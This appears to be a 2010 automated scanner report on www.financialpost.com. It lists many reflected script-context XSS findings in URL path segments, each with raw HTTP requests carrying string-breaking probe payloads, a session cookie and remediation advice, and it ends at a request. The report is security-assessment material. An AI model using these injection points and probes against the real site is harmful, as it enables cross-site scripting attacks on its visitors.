Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7cf31'%3bc915d077dc3 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42973
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa69'%3be60d6f1c0da was submitted in the REST URL parameter 1. This input was echoed as 4aa69';e60d6f1c0da in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4aa69'%3be60d6f1c0da HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42973
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4855a'%3bc818f85888d was submitted in the REST URL parameter 1. This input was echoed as 4855a';c818f85888d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets4855a'%3bc818f85888d/css/idc/idms_styles.css HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:24 GMT Date: Sun, 19 Dec 2010 03:03:24 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43354
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40c4'%3bad7596597dc was submitted in the REST URL parameter 2. This input was echoed as c40c4';ad7596597dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/cssc40c4'%3bad7596597dc/idc/idms_styles.css HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:29 GMT Date: Sun, 19 Dec 2010 03:03:29 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43318
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b313'%3b698c4e0738c was submitted in the REST URL parameter 3. This input was echoed as 1b313';698c4e0738c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idc1b313'%3b698c4e0738c/idms_styles.css HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:34 GMT Date: Sun, 19 Dec 2010 03:03:34 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43281
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3be0'%3b80f99c8f660 was submitted in the REST URL parameter 4. This input was echoed as e3be0';80f99c8f660 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idc/e3be0'%3b80f99c8f660 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:03:40 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43284
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 124dc'%3b0b5b2a36149 was submitted in the REST URL parameter 1. This input was echoed as 124dc';0b5b2a36149 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets124dc'%3b0b5b2a36149/css/idc/watchlist.css HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:23 GMT Date: Sun, 19 Dec 2010 03:03:23 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43333
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9facd'%3bc69670aae3e was submitted in the REST URL parameter 2. This input was echoed as 9facd';c69670aae3e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css9facd'%3bc69670aae3e/idc/watchlist.css HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:28 GMT Date: Sun, 19 Dec 2010 03:03:28 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43298
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f6a'%3b858dfffb16a was submitted in the REST URL parameter 3. This input was echoed as a9f6a';858dfffb16a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idca9f6a'%3b858dfffb16a/watchlist.css HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:33 GMT Date: Sun, 19 Dec 2010 03:03:33 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43261
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f81'%3b65df32cf4f8 was submitted in the REST URL parameter 4. This input was echoed as 88f81';65df32cf4f8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/css/idc/88f81'%3b65df32cf4f8 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:03:39 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43284
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b85'%3bc4767f71b50 was submitted in the REST URL parameter 1. This input was echoed as 40b85';c4767f71b50 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets40b85'%3bc4767f71b50/include/thirdparty/idc/ad-init.js HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:27 GMT Date: Sun, 19 Dec 2010 03:03:27 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43677
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9d1'%3b3317ae53630 was submitted in the REST URL parameter 2. This input was echoed as 8b9d1';3317ae53630 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include8b9d1'%3b3317ae53630/thirdparty/idc/ad-init.js HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:32 GMT Date: Sun, 19 Dec 2010 03:03:32 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43640
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1cea'%3b38c5aa0a5e8 was submitted in the REST URL parameter 3. This input was echoed as f1cea';38c5aa0a5e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include/thirdpartyf1cea'%3b38c5aa0a5e8/idc/ad-init.js HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:37 GMT Date: Sun, 19 Dec 2010 03:03:37 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43604
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6456b'%3b4a9a61322fb was submitted in the REST URL parameter 4. This input was echoed as 6456b';4a9a61322fb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include/thirdparty/idc6456b'%3b4a9a61322fb/ad-init.js HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:42 GMT Date: Sun, 19 Dec 2010 03:03:42 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43587
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9094'%3b9fe591fa809 was submitted in the REST URL parameter 5. This input was echoed as e9094';9fe591fa809 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/include/thirdparty/idc/e9094'%3b9fe591fa809 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://idms.financialpost.com/watchlist/watchlist.idms Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:03:47 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43595
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c67f5'%3b33a72d2d10d was submitted in the REST URL parameter 1. This input was echoed as c67f5';33a72d2d10d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajaxc67f5'%3b33a72d2d10d/email/generic.xml HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 02:58:13 GMT Date: Sun, 19 Dec 2010 02:58:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43245
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9df8'%3b9082a8b2204 was submitted in the REST URL parameter 2. This input was echoed as e9df8';9082a8b2204 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/emaile9df8'%3b9082a8b2204/generic.xml HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 02:58:19 GMT Date: Sun, 19 Dec 2010 02:58:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43209
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e698'%3b8b8919e8594 was submitted in the REST URL parameter 3. This input was echoed as 6e698';8b8919e8594 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/email/6e698'%3b8b8919e8594 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
